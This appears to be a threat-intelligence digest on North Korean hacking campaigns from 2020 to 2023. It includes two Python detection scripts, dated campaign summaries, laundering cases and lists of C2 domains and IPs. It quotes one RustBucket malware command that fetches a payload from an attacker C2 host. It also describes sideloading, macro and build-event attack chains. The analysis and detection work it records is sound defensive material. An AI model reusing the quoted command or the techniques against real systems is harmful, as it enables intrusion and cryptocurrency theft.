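2020-11-02T12:02:59 10.0.0.15 GET http://updates.example.invalid/wp-includes/update.php
2020-11-02T12:03:30 10.0.0.22 GET http://www.example.invalid/index.html
2020-11-02T12:03:42 10.0.0.22 GET http://www.example.invalid/index.html
2020-11-02T12:04:00 10.0.0.15 GET http://updates.example.invalid/wp-includes/update.php
2020-11-02T12:05:00 10.0.0.15 GET http://updates.example.invalid/wp-includes/update.php
2020-11-02T12:18:42 10.0.0.22 GET http://www.example.invalid/index.html
"""


def parse_log(text: str):
    """Yield (timestamp, client, host, path) for each well-formed line; skip the rest."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, client, _method, url = parts
        u = urlsplit(url)
        yield datetime.fromisoformat(ts), client, u.hostname, u.path


def find_beacons(records, min_hits: int = 5, max_jitter: float = 0.10, max_period: float = 3600.0):
    """Flag (client, host, path) tuples whose inter-request gaps are regular.

    jitter = population stddev of the gaps divided by their mean. A human browsing
    produces jitter near or above 1; a timer-driven implant produces jitter near 0.
    """
    groups = defaultdict(list)
    for ts, client, host, path in records:
        groups[(client, host, path)].append(ts)
    beacons = []
    for key, times in groups.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = mean(gaps)
        if period <= 0 or period > max_period:
            continue
        jitter = pstdev(gaps) / period
        if jitter <= max_jitter:
            beacons.append({"client": key[0], "host": key[1], "path": key[2],
                            "period_s": round(period, 1), "jitter": round(jitter, 3), "hits": len(times)})
    return beacons


if __name__ == "__main__":
    for beacon in find_beacons(parse_log(SAMPLE_LOG)):
        print(beacon)
```

Tuning matters: min_hits keeps short bursts out, max_jitter around 0.1 catches implants that sleep a fixed interval, and an implant that adds random sleep needs a looser threshold and a longer window. Software updaters also poll on fixed timers, so confirm a hit against the destination before acting on it.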
VHD ransomware, Hakuna MATA
Date:: 2020-07-01
initial access was achieved through opportunistic exploitation of a vulnerable VPN gateway. After that, the attackers obtained administrative privileges, deployed a backdoor on the compromised system and were able to take over the Active Directory server.
U.S. seeks forfeiture of $2,372,793 for violations of sanctions against the DPRK
Date:: 2020-07-23
According to the complaint, the four companies laundered U.S. dollars on behalf of sanctioned North Korean banks and helped those banks to illegally access the U.S. financial market.
The complaint lists one source of the laundered funds as a DPRK entity involved in the banned sales of North Korean coal. The laundered funds were used to purchase Russian petroleum products and nuclear and missile components for the DPRK and to aid multiple covert branches of the DPRK’s Foreign Trade Bank, which the U.S. Treasury Department had sanctioned for “facilitating transactions on behalf of actors linked to the DPRK’s proliferation network”.
Yang Ban Corporation Pleads Guilty to Money Laundering
Date:: 2020-08-31
From at least February 2017 to May 2018 and beyond, Yang Ban deceived banks in the U.S. into processing transactions for North Korean customers of Yang Ban.
It used front companies and created false sets of invoices and shipping records to conceal that the ultimate destination of shipments were customers in the DPRK. These practices helped Yang Ban circumvent “banks’ sanction and anti-money laundering filters” thus “duping U.S. correspondent banks into processing U.S. dollar transactions that they would not otherwise have authorized.”
Yang Ban specifically admitted to conspiring with SINSMS (a company subsequently designated by U.S. sanctions) and others, “to conceal the North Korean nexus” by falsifying shipping records and by other means.
The company will pay a financial penalty totaling $673,714 (USD) and has “agreed to implement rigorous internal controls and to cooperate fully with the Justice Department, including by reporting any criminal conduct by an employee”.
The campaign succeeded in infecting several dozen companies and organizations in Israel and globally
Main targets: defense, governmental companies, and specific employees of those companies
We assess this to be this year’s main offensive campaign by the Lazarus group
The infection and infiltration of target systems had been carried out through a widespread and sophisticated social engineering campaign, which included: reconnaissance, creation of fictitious LinkedIn profiles, sending emails to the targets’ personal addresses, and conducting a continuous dialogue with the target – directly on the phone, and over WhatsApp
Upon infection, the attackers collected intelligence regarding the company’s activity, and also its financial affairs, probably in order to try and steal some money from it
The double scenario of espionage and money theft is unique to North Korea, which operates intelligence units that steal both information and money for their country.
CISA's analysis of North Korean Remote Access Trojan: BLINDINGCAN
Date:: 2020-08-19
CISA and FBI have identified a malware variant—referred to as BLINDINGCAN—used by North Korean actors. FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. A threat group with a nexus to North Korea targeted government contractors early this year to gather intelligence surrounding key military and energy technologies.
DPRK-aligned threat actor targeting cryptocurrency vertical with global hacking campaign
CISA: Report FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks
Date:: 2020-08-26
MAR 10301706-1.v1: North Korean Remote Access Tool: ECCENTRICBANDWAGON
MAR 10301706-2.v1: North Korean Remote Access Tool: VIVACIOUSGIFT
MAR 10257062-1.v2: North Korean Remote Access Tool: FASTCASH for Windows
CISA, the Department of the Treasury, FBI, and U.S. Cyber Command released a joint Technical Alert and three MARs on the North Korean government’s ATM cash-out scheme—referred to by the U.S. Government as “FASTCash.”
US DOJ: Forfeiture Complaint for 280 Crypto addresses tied to North Korea
Date:: 2020-08-28
These actors stole millions of dollars’ worth of cryptocurrency and ultimately laundered the funds through Chinese over-the-counter (OTC) cryptocurrency traders.
US DOJ: Lazarus Group developed multiple malicious crypto applications from March 2018 through at least September 2020. Such apps include Celas Trade Pro, Worldbit-bot, icryptofx, Union Crypto Trader, Kupay Wallet, Coingo Trade, Dorusio, Cryptoneuro Trader, and Ants2whale.
Secret documents show how North Korea launders money through U.S. banks
Date:: 2020-09-20
An employee of the pharmaceutical company received a document named GD2020090939393903.doc with a job offer (creation date: 2020:09:22 03:08:00).
After a short period of time, another employee received a document named GD20200909GAB31.doc with a job offer from the same company (creation date: 2020:09:14 07:50:00). By opening the documents from a potential employer, both victims activated malicious macros on their home computers.
In one of the cases, a malicious document was received via Telegram. Note that both documents were received by the victims over the weekend.
At the same time, by performing reconnaissance on the computers available, the attackers received new vectors for penetration into the company's corporate network. So, two days later, after the company's network infrastructure was compromised, another employee from another branch received a job offer. On the social network LinkedIn, the victim was contacted by a user named Rob Wilson, shortly after which she received an email with a job offer from General Dynamics UK.
The compromised user also forwarded the malicious email to her colleague. However, the recipient did not open the malicious document and did not allow the attackers to expand the attack surface.
In this campaign, attackers, under the guise of the HR service of General Dynamics Mission Systems, sent documents with malicious macros containing a stub text with a job offer through LinkedIn Messages, Telegram, WhatsApp, and corporate email.
CISA: Report on North Korean Advanced Persistent Threat Focus: Kimsuky
Date:: 2020-10-27
CISA, FBI, and the U.S. Cyber Command Cyber National Mission Force (CNMF) released a new Joint Cybersecurity Advisory on TTPs used by North Korean APT group Kimsuky.
North Korean hackers targeted COVID vaccine maker AstraZeneca
By using spear-phishing methods, members of Lazarus Group acted as health officials and reached out to a number of pharmaceutical companies. Once trust was gained, Lazarus Group sent a number of malicious links to the companies. It is unconfirmed what the goal of the attack was, but it is suspected that they were looking to sell data for profit, extort the companies and their employees, and give foreign entities access to proprietary COVID-19 Research.
North Korean cybercriminals had a banner year in 2021, launching at least seven attacks on cryptocurrency platforms that extracted nearly $400M worth of digital assets last year.
These attacks targeted primarily investment firms and centralized exchanges, and made use of phishing lures, code exploits, malware, and advanced social engineering to siphon funds out of these organizations’ internet-connected “hot” wallets into DPRK-controlled addresses.
Once North Korea gained custody of the funds, they began a careful laundering process to cover up and cash out. These complex tactics and techniques have led many security researchers to characterize cyber actors for the Democratic People’s Republic of Korea (DPRK) as advanced persistent threats (APTs). This is especially true for APT 38, also known as “Lazarus Group,” which is led by DPRK’s primary intelligence agency, the US- and UN-sanctioned Reconnaissance General Bureau.
While we will refer to the attackers as North Korean-linked hackers more generally, many of these attacks were carried out by the Lazarus Group in particular. Lazarus Group first gained notoriety from its Sony Pictures and WannaCry cyberattacks, but it has since concentrated its efforts on cryptocurrency crime—a strategy that has proven immensely profitable.
From 2018 on, the group has stolen and laundered massive sums of virtual currencies every year, typically in excess of $200M. The most successful individual hacks, one on KuCoin and another on an unnamed cryptocurrency exchange, each netted more than $250M alone.
Interestingly, in terms of dollar value, Bitcoin now accounts for less than one fourth of the cryptocurrencies stolen by DPRK.
In 2021, only 20% of the stolen funds were Bitcoin, whereas 22% were either ERC-20 tokens or altcoins. And for the first time ever, Ether accounted for a majority of the funds stolen at 58%.
The growing variety of cryptocurrencies stolen has necessarily increased the complexity of DPRK’s cryptocurrency laundering operation. Today, DPRK’s typical laundering process is as follows:
More than 65% of DPRK’s stolen funds were laundered through mixers this year, up from 42% in 2020 and 21% in 2019, suggesting that these threat actors have taken a more cautious approach with each passing year.
Why mixers? DPRK is a systematic money launderer, and their use of multiple mixers is a calculated attempt to obscure the origins of their ill-gotten cryptocurrencies while offramping into fiat. Why DeFi? DeFi platforms like DEXs provide liquidity for a wide range of ERC-20 tokens and altcoins that may not otherwise be convertible into cash. When DPRK swaps these coins for ETH or BTC they become much more liquid, and a larger variety of mixers and exchanges become usable. What’s more, DeFi platforms don’t take custody of user funds and many do not collect know-your-customer (KYC) information, meaning that cybercriminals can use these platforms without having their assets frozen or their
DPRK’s stolen fund stockpile: $170M worth of old, unlaundered cryptocurrency holdings. Chainalysis has identified $170M in current balances—representing the stolen funds of 49 separate hacks spanning from 2017 to 2021—that are controlled by North Korea but have yet to be laundered through services. The ten largest balances by dollar value are listed below.
Of DPRK’s total holdings, roughly $35M came from attacks in 2020 and 2021. By contrast, more than $55M came from attacks carried out in 2016—meaning that DPRK has massive unlaundered balances as much as six years old.
Google TAG report on a new campaign targeting security researchers
Date:: 2021-01-25
Government-backed entity based in North Korea. Social media targeting.
The actors established a research blog and multiple Twitter profiles to interact with potential targets. They've used these Twitter profiles for posting links to their blog, posting videos of their claimed exploits and for amplifying and retweeting posts from other accounts that they control.
Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including “guest” posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.
After establishing initial communications, the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project. Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events. The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains. An example of the VS Build Event can be seen in the image below.
In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog. In each of these cases, the researchers have followed a link on Twitter to a write-up hosted on blog.br0vvnn[.]io, and shortly thereafter, a malicious service was installed on the researcher’s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server. At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions.
These actors have used multiple platforms to communicate with potential targets, including Twitter, LinkedIn, Telegram, Discord, Keybase and email
A pre-build event with a PowerShell command was used to launch Comebacker via rundll32. This use of a malicious pre-build event is an innovative technique to gain execution.
Klackring malware
In addition to the social engineering attacks via social media platforms, we observed that ZINC sent researchers a copy of a br0vvnn blog page saved as an MHTML file with instructions to open it with Internet Explorer. The MHTML file contained some obfuscated JavaScript that called out to a ZINC-controlled domain for further JavaScript to execute. The site was down at the time of investigation and we have not been able to retrieve the payload for further analysis.
In one instance, we discovered the actor had downloaded an old version of the Viraglt64.sys driver from the Vir.IT eXplorer antivirus. The file was dropped to the victim system as C:\Windows\System32\drivers\circlassio.sys. The actor then attempted to exploit CVE-2017-16238, described by the finder here, where the driver doesn’t perform adequate checking on a buffer it receives, which can be abused to gain an arbitrary kernel write primitive. The actor’s code however appears to be buggy and when attempting to exploit the vulnerability the exploit tried to overwrite some of the driver’s own code which crashed the victim’s machine.
Other tools used included an encrypted Chrome password-stealer hosted on ZINC domain https://codevexillium[.]org. The host DLL (SHA-256: ada7e80c…) was downloaded to the path C:\ProgramData\USOShared\USOShared.bin using PowerShell and then ran via rundll32. This malware is a weaponized version of CryptLib, and it decrypted the Chrome password stealer (SHA-256: 9fd0506…), which it dropped to C:\ProgramData\USOShared\USOShared.dat.
Actor-controlled Twitter Handles
FBI + CISA: Report on Operation AppleJeus - Celas Trade Pro, JMT Trading, Union Crypto, Kupay Wallet, CoinGoTrade, Dorusio, Ants2Whale
Date:: 2021-02-17
targeting individuals and companies, including cryptocurrency exchanges and financial service companies, through the dissemination of cryptocurrency trading applications that have been modified to include malware that facilitates theft of cryptocurrency
the malicious application—seen on both Windows and Mac operating systems—appears to be from a legitimate cryptocurrency trading company, thus fooling individuals into downloading it as a third-party application from a website that seems legitimate
infecting victims through legitimate-looking websites, HIDDEN COBRA actors also use phishing, social networking, and social engineering techniques to lure users into downloading the malware.
Celas Trade Pro, JMT Trading, Union Crypto, Kupay Wallet, CoinGoTrade, Dorusio, Ants2Whale
Nigerian Instagram celebrity Ramon Abbas, also known as Hushpuppi, has been named in another case in the United States, this time with North Korean hackers involved.
The United States Justice Department said Hushpuppi conspired with a Canadian-American citizen Ghaleb Alaumary and others to launder funds from a North Korean-perpetrated cyber-enabled heist from a Maltese bank in February 2019.
Hushpuppi is currently facing separate trial for conspiring “to launder hundreds of millions of dollars from BEC frauds and other scams.”
“The affidavit also alleges that Abbas conspired to launder funds stolen in a $14.7 million cyber-heist from a foreign financial institution in February 2019, in which the stolen money was sent to bank accounts around the world.
Federal prosecutors today also unsealed a charge against Ghaleb Alaumary, 37, of Mississauga, Ontario, Canada, for his role as a money launderer for the North Korean conspiracy, among other criminal schemes. Alaumary agreed to plead guilty to the charge, which was filed in the U.S. District Court in Los Angeles on Nov. 17, 2020. Alaumary was a prolific money launderer for hackers engaged in ATM cash-out schemes, cyber-enabled bank heists, business email compromise (BEC) schemes, and other online fraud schemes. Alaumary is also being prosecuted for his involvement in a separate BEC scheme by the U.S. Attorney’s Office for the Southern District of Georgia.
With respect to the North Korean co-conspirators’ activities, Alaumary organized teams of co-conspirators in the United States and Canada to launder millions of dollars obtained through ATM cash-out operations, including from BankIslami and a bank in India in 2018.
Alaumary also conspired with Ramon Olorunwa Abbas, aka “Ray Hushpuppi,” and others to launder funds from a North Korean-perpetrated cyber-enabled heist from a Maltese bank in February 2019. Last summer, the U.S. Attorney’s Office in Los Angeles charged Abbas in a separate case alleging that he conspired to launder hundreds of millions of dollars from BEC frauds and other scams.
The Incredible Rise of North Korea’s Hacking Army - Lazarus group’s criminal enterprises including cryptocurrency exchange heists and ransomware attacks
In April 2021, we observed a suspicious Word document with a Korean file name and decoy. It revealed a novel infection scheme and an unfamiliar payload. While we were doing our research into these findings, Malwarebytes published a nice report with technical details about the same series of attacks, which they attributed to the Lazarus group. After a deep analysis, we came to a more precise conclusion: the Andariel group was behind these attacks. Andariel was designated by the Korean Financial Security Institute as a sub-group of Lazarus.
Our attribution is based on the code overlaps between the second stage payload in this campaign and previous malware from the Andariel group. Apart from the code similarity, we found an additional connection with the Andariel group. Each threat actor has characteristics when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.
Mid-2020 onwards, they've leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim getting infected with custom ransomware. It adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs.
HushPuppi - The Fall Of The Billionaire Gucci Master
Date:: 2021-06-30
Authorities say Ramon Abbas, aka Hushpuppi, perfected a simple internet scam and laundered millions of dollars. His past says a lot about digital swagger, and the kinds of stories that get told online.
CVE-2022-1096 reported by anon - type confusion V8
Date:: 2022-03-23
FireEye/Mandiant - Not So Lazarus: Mapping DPRK Cyber Threat Groups to Government Organizations
Date:: 2022-03-23
CVE-2022-0609 Google posts update about zero day CVE-2022-0609 - Operation Dream Job and Operation AppleJeus
Date:: 2022-03-24
Campaigns targeting U.S. based organizations spanning news media, IT, cryptocurrency and fintech industries.
Targeted over 250 individuals working for 10 different news media, domain registrars, web hosting providers and software vendors. The targets received emails claiming to come from recruiters at Disney, Google and Oracle with fake potential job opportunities. The emails contained links spoofing legitimate job hunting websites like Indeed and ZipRecruiter.
Operation AppleJeus targeted over 85 users in cryptocurrency and fintech industries leveraging the same exploit kit. This included compromising at least two legitimate fintech company websites and hosting hidden iframes to serve the exploit kit to visitors. In other cases, we observed fake websites — already set up to distribute trojanized cryptocurrency applications — hosting iframes and pointing their visitors to the exploit kit.
The campaign begins by sending them phishing emails purporting to be from recruiters at Disney, Google, and Oracle, offering them false employment opportunities. The emails included links to bogus job-search websites such as Indeed and ZipRecruiter. Targets who clicked on the included malicious URLs were infected with drive-by browser malware downloads. The North Korean groups were utilizing an exploit kit (CVE-2022-0609) with hidden iframes embedded into a variety of websites. The attack kit may fingerprint target devices by collecting details like user-agent and screen resolution. After that the exploit kit executes a Chrome remote code execution hack capable of bypassing the lauded Chrome sandbox to move out onto the system.
CVE-2022-1096 Chrome Update Released - type confusion V8
Date:: 2022-03-25
Lazarus Trojanized DeFi app for delivering malware
Date:: 2022-03-31
We recently discovered a Trojanized DeFi application that was compiled in November 2021. This application contains a legitimate program called DeFi Wallet that saves and manages a cryptocurrency wallet,
APT Group Lazarus Distributing Korean Phishing Lures to Feel Out Cryptocurrency Users
Date:: 2022-04-12
In this attack, Lazarus built a type of decoy document containing an “AhnLab” icon and prompt information. The prompts for these documents vary, but the common goal is to trick victims into enabling Office’s document editing capabilities. AhnLab is a cyber security vendor with its headquarters in South Korea. Lazarus uses the name to increase the persuasiveness of the decoy document.
Another type of decoy document contains Binance icons and related tips. Binance is a cryptocurrency trading platform.
CVE-2022-1364 Reported by Google TAG's Clément Lecigne
Date:: 2022-04-13
Type Confusion, V8 Engine
CVE-2022-1364 Chrome Update Released, everyone told to update urgently
Beginning in June 2022, ZINC employed traditional social engineering tactics by initially connecting with individuals on LinkedIn to establish a level of trust with their targets. Upon successful connection, ZINC encouraged continued communication over WhatsApp, which acted as the means of delivery for their malicious payloads.
Weaponized wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for these attacks
Observed attempting to move laterally and exfiltrate collected information from victim networks. The actors have successfully compromised numerous organizations since June 2022.
The ongoing campaign related to the weaponized PuTTY was also reported by Mandiant earlier this month. Due to the wide use of the platforms and software that ZINC utilizes in this campaign, ZINC could pose a significant threat to individuals and organizations across multiple sectors and regions.
Analysis Report on Lazarus Group's Rootkit Malware That Uses BYOVD
Lazarus Group had been observed targeting public and private sector research organizations, medical research and energy sectors, as well as their supply chains. This campaign, dubbed “No Pineapple”, focused on intelligence-gathering, starting with an attack on a company that was exploited through CVE-2022-27925 (remote code execution) and CVE-2022-37042 (authentication bypass) – two vulnerabilities affecting the digital collaboration
In June 2022, the Lazarus Group registered the domain name bloxholder[.]com, and then configured it to host a website related to automated cryptocurrency trading.
AppleJeus C2:: strainservice[.]com
AppleJeus C2:: bloxholder[.]com
AppleJeus C2:: rebelthumb[.]net
AppleJeus C2:: wirexpro[.]com
AppleJeus C2:: oilycargo[.]com
AppleJeus C2:: telloo[.]io
Microsoft: DEV-0139 launches targeted attacks against the cryptocurrency industry
We are also seeing more complex attacks wherein the threat actor shows great knowledge and preparation, taking steps to gain their target’s trust before deploying payloads. For example, Microsoft recently investigated an attack where the threat actor, tracked as DEV-0139, took advantage of Telegram chat groups to target cryptocurrency investment companies. DEV-0139 joined Telegram groups used to facilitate communication between VIP clients and cryptocurrency exchange platforms and identified their target from among the members. The threat actor posed as representatives of another cryptocurrency investment company, and in October 2022 invited the target to a different chat group and pretended to ask for feedback on the fee structure used by cryptocurrency exchange platforms. The threat actor had a broader knowledge of this specific part of the industry, indicating that they were well prepared and aware of the current challenge the targeted companies may have.
After gaining the target’s trust, DEV-0139 then sent a weaponized Excel file with the name OKX Binance & Huobi VIP fee comparision.xls which contained several tables about fee structures among cryptocurrency exchange companies. The data in the document was likely accurate to increase their credibility. This weaponized Excel file initiates the following series of activities:
A malicious macro in the weaponized Excel file abuses UserForm of VBA to obfuscate the code and retrieve some data.
The malicious macro drops another Excel sheet embedded in the form and executes it in invisible mode. The said Excel sheet is encoded in base64, and dropped into C:\ProgramData\Microsoft Media\ with the name VSDB688.tmp
The file VSDB688.tmp downloads a PNG file containing three executables: a legitimate Windows file named logagent.exe, a malicious version of the DLL wsock32.dll, and an XOR encoded backdoor.
The file logagent.exe is used to sideload the malicious wsock32.dll, which acts as a DLL proxy to the legitimate wsock32.dll. The malicious DLL file is used to load and decrypt the XOR encoded backdoor that lets the threat actor remotely access the infected system.
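The four-stage chain above maps onto two host telemetry signals a defender can watch for: an Office process writing into C:\ProgramData\Microsoft Media\, and the legitimate logagent.exe loading wsock32.dll from its own, non-system directory instead of System32. The following Python is an added example, not Microsoft's code; it runs those two checks over constructed Sysmon-style records (FileCreate and ImageLoad). The record field names, the inclusion of winword.exe as a writer, and the directory logagent.exe is dropped into are assumptions, not details from the report.

```python
r"""Detection logic for the DEV-0139 Excel-to-sideload chain.

Added example, not Microsoft's code. Operates on constructed, Sysmon-style
telemetry records (plain dicts) so it runs offline. Indicators taken from
the report: EXCEL.EXE dropping VSDB688.tmp into C:\ProgramData\Microsoft Media\
and logagent.exe sideloading wsock32.dll. Field names (type, image, target,
image_loaded, host) are assumptions mirroring Sysmon EventID 11 and 7.
"""
from pathlib import PureWindowsPath

# Staging directory named in the report; the macro drops VSDB688.tmp here.
STAGING_DIR = PureWindowsPath(r"C:\ProgramData\Microsoft Media")
# Directories from which a legitimate wsock32.dll load is expected.
SYSTEM_DIRS = (
    PureWindowsPath(r"C:\Windows\System32"),
    PureWindowsPath(r"C:\Windows\SysWOW64"),
)


def is_office_staging_drop(ev):
    """Office process writing a file into the staging directory (stage 2)."""
    if ev["type"] != "file_create":
        return False
    writer = PureWindowsPath(ev["image"]).name.lower()
    target = PureWindowsPath(ev["target"])
    # PureWindowsPath equality is case-insensitive, as Windows paths are.
    return writer in {"excel.exe", "winword.exe"} and target.parent == STAGING_DIR


def is_wsock32_sideload(ev):
    """logagent.exe loading wsock32.dll from a non-system directory (stage 4)."""
    if ev["type"] != "image_load":
        return False
    image = PureWindowsPath(ev["image"])
    loaded = PureWindowsPath(ev["image_loaded"])
    if image.name.lower() != "logagent.exe" or loaded.name.lower() != "wsock32.dll":
        return False
    # A proxy DLL sitting beside the EXE (search-order hijack) is what we flag;
    # a load from System32/SysWOW64 is the normal case and is ignored.
    return loaded.parent not in SYSTEM_DIRS and loaded.parent == image.parent


def triage(events):
    """Return (rule, host, detail) tuples for every matching record."""
    hits = []
    for ev in events:
        if is_office_staging_drop(ev):
            hits.append(("office_staging_drop", ev["host"], ev["target"]))
        elif is_wsock32_sideload(ev):
            hits.append(("wsock32_sideload", ev["host"], ev["image_loaded"]))
    return hits


# Constructed sample telemetry. The directory logagent.exe lands in is an
# assumption; the report does not state where the three files are written.
SAMPLE_EVENTS = [
    {"type": "file_create", "host": "wks01",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "target": r"C:\ProgramData\Microsoft Media\VSDB688.tmp"},
    {"type": "file_create", "host": "wks01",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "target": r"C:\Users\alice\Documents\budget.xlsx"},  # benign save
    {"type": "image_load", "host": "wks01",
     "image": r"C:\ProgramData\Microsoft Media\logagent.exe",
     "image_loaded": r"C:\ProgramData\Microsoft Media\wsock32.dll"},
    {"type": "image_load", "host": "wks02",
     "image": r"C:\Windows\System32\logagent.exe",
     "image_loaded": r"C:\Windows\System32\wsock32.dll"},  # normal load
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

The sideload rule deliberately requires the DLL to sit in the same directory as the EXE rather than just "not System32"; that is the condition under which the proxy DLL wins the search order, and it keeps the rule from firing on redistributed copies of wsock32.dll elsewhere on disk.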
Kimsuky - North Korea’s Cryptocurrency Craze and its Impact on U.S. Policy
Date:: 2023-01-12
Kimsuky distributed document-type malware targeting security experts, which uses an external object within a Word document to execute an additional malicious macro (template Injection method).
Same tactics used as in Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers); in this case, the threat actor used an image that prompts users to execute the macro.
The Lazarus Group carried out anti-forensics to conceal their malicious activities. They transmitted a configuration file with C2 information and a PE file that communicates with the C2 server in encrypted forms to evade detection by security products. The encrypted files operate after being decrypted onto the memory by the loader file. They then receive additional files from the C2 and perform malicious actions.
Jamf - BlueNoroff APT group targets macOS with ‘RustBucket’ Malware
Date:: 2023-04-21
Jamf Threat Labs has discovered a macOS malware family that communicates with command and control (C2) servers to download and execute various payloads. This attribution is due to the similarities noted in a Kaspersky blog.
North Korea is now Mining Crypto to Launder Its Stolen Loot
Date:: 2023-05-23
Today, cybersecurity firm Mandiant published a report on a prolific North Korean state-sponsored hacking group it's now calling APT43, sometimes known by the names Kimsuky and Thallium. The group, whose activities suggest its members work in the service of North Korea's Reconnaissance General Bureau spy agency, has been primarily focused on espionage, hacking think tanks, academics, and private industry from the US to Europe, South Korea, and Japan since at least 2018, mostly with phishing campaigns designed to harvest credentials from victims and plant malware on their machines.
Like many North Korean hacker groups, APT43 also maintains a sideline in profit-focused cybercrime, according to Mandiant, stealing any cryptocurrency that can enrich the North Korean regime or even just fund the hackers' own operations. And as regulators worldwide have tightened their grip on exchanges and laundering services that thieves and hackers use to cash out criminally tainted coins, APT43 appears to be trying out a new method to cash out the funds it steals while preventing them from being seized or frozen: It pays that stolen cryptocurrency into “hashing services” that allow anyone to rent time on computers used to mine cryptocurrency, harvesting newly mined coins that have no apparent ties to criminal activity.
The RustBucket infection chain consists of a macOS installer that installs a backdoored, yet functional, PDF reader. The fake PDF reader then requires opening a specific PDF file that operates as a key to trigger the malicious activity.
When opened in a classical PDF reader, the PDF document displays a message asking the user to open the document in the proper reader (i.e. the backdoored one). When opened in this reader, the PDF displays a nine-page document about a venture capital company that appears to be the printout of a legit company’s website. The fake PDF reader uses a hardcoded 100-byte XOR key to decrypt the new content of the document and the C2 server configuration.
During our investigation on the macOS variant, Sekoia.io analysts identified a .NET version of RustBucket, with a similar GUI, developed using the library DevExpress.XtraPdfViewer. The malware was embedded in a ZIP archive containing the PDF reader and the “key” PDF requiring user interaction.
Bluenoroff’s observed initial intrusion vector includes phishing emails, as well as leveraging social networks such as LinkedIn. During our investigations, we identified the domain sarahbeery.docsend[.]me, further analysis led us to the following LinkedIn profile:
RustBucket MacOS version - 2023-05-08 - Jump Crypto Investment Agreement
Key PDF file 2 - PDF - DOJ Report on Bizlato Investigation_asistant.pdf 07d206664a8d397273e69ce37ef7cf933c22e93b62d95b673d6e835876feba06
safe.doc-share[.]cloud
IPs and Domains:
104.156.149[.]130 (2023-04-18)
104.255.172[.]52 (2023-03-18)
104.234.147[.]28 (2023-01-21)
104.168.138[.]7 (2023-03-17)
104.168.167[.]88 (2022-10-17)
155.138.159[.]45 (2022-09-20)
104.255.172[.]56 (2022-09-15 - 2023-04-11)
172.93.181[.]221 (2022-12-28 - 2023-03-06)
172.86.121[.]143 (2022-10-31 - 2022-12-21)
172.86.121[.]130 (2022-10-25 - 2023-01-24)
149.28.247[.]34 (2022-11-11 - 2022-11-11)
152.89.247[.]87 (2022-09-15 - 2022-10-24)
104.168.174[.]80 (2022-06-28 - 2022-09-16)
149.248.52[.]31 (2022-08-05 - 2022-08-31)
155.138.219[.]140 (2022-07-17 - 2022-08-16)
Kimsuky - Kimsuky Strikes Again | New Social Engineering Campaign Aims to Steal Credentials and Gather Strategic Intelligence
Date:: 2023-06-06
Kimsuky conducted a social engineering campaign targeting experts in DPRK issues to steal Google and subscription credentials of a reputable news and analysis service focusing on the DPRK, as well as deliver reconnaissance malware. Kimsuky also engaged in extensive email correspondence and used spoofed URLs, websites imitating legitimate web platforms and Office documents weaponized with the ReconShark malware. The activity indicates Kimsuky’s growing dedication to social engineering and highlights the group’s increasing interest in gathering strategic intelligence.
During routine detection maintenance, our Mac researchers stumbled upon a small set of files with backdoor capabilities that seem to form part of a more complex malware toolkit. The following analysis is incomplete, as we are trying to identify the puzzle pieces that are still missing.
Two of the three isolated samples are generic backdoors written in Python that seem to target Mac OS, Windows and Linux-based operating systems.
www.git-hub[.]me/view.php
Andariel’s silly mistakes and a new malware family
In the intrusions seen to date, researchers identified two Python backdoors, shared.dat and sh.py. The former uses a simple rot13 string obfuscation technique.
The sh.py backdoor is also multi-platform and requires a separate configuration file stored at ~/Public/Safari/sar.dat, likely containing the C2 as well as other parameters. The C2 observed by Elastic in an attack on an unnamed Japanese cryptocurrency exchange was app.influmarket[.]org.
An overview of JOKERSPY, discovered in June 2023, which deployed custom and open source macOS tools to exploit a cryptocurrency exchange located in Japan.
sh.py is a Python backdoor used to deploy and execute other post-exploitation capabilities like Swiftbelt.
app.influmarket[.]org
How DPRK’s macOS RustBucket Seeks to Evade Analysis and Detection
do shell script "curl -o \"/users/shared/Potential Risks of Cryptocurrency Assets.pdf\" https://crypto.hondchain.com/OuhVX8sdV21/HBKPHFlbyt/9zkMp5L5HS/fP7saoS3GZ/7fVinrx -A cur1-agent"
104.168.167[.]88
C2:: crypto.hondchain[.]com
C2:: starbucls[.]xyz
C2:: jaicvc[.]com
C2:: docsend.linkpc[.]net (dynamic DNS domain)
GitHub Security Alert: Social engineering campaign targets technology industry employees
At the end of May 2023, JPCERT/CC confirmed an attack targeting developers of cryptocurrency exchange businesses, and it is considered to be related to the targeted attack group DangerousPassword [1], [2] (a.k.a. CryptoMimic or SnatchCrypto), which has been continuously attacking since June 2019. This attack targeted Windows, macOS, and Linux environments with Python and Node.js installed on the machine. This article explains the attack that JPCERT/CC has confirmed and the malware used.
Python malware is simple downloader-type malware that downloads and executes MSI files from an external source. As shown in Figure 2, it is characterized by its extensive use of ROT13 to obfuscate C2 strings and other strings used.
Scarcruft - Detecting Ongoing STARK#MULE Attack Campaign Targeting Victims Using US Military Document Lures
Date:: 2023-07-28
ScarCruft lured victims using U.S. military-related documents to run malware staged from legitimate compromised Republic of Korea websites. The goal seems to have been to spark the recipient’s curiosity enough to have them open the attached documents and inadvertently execute the contained malware.
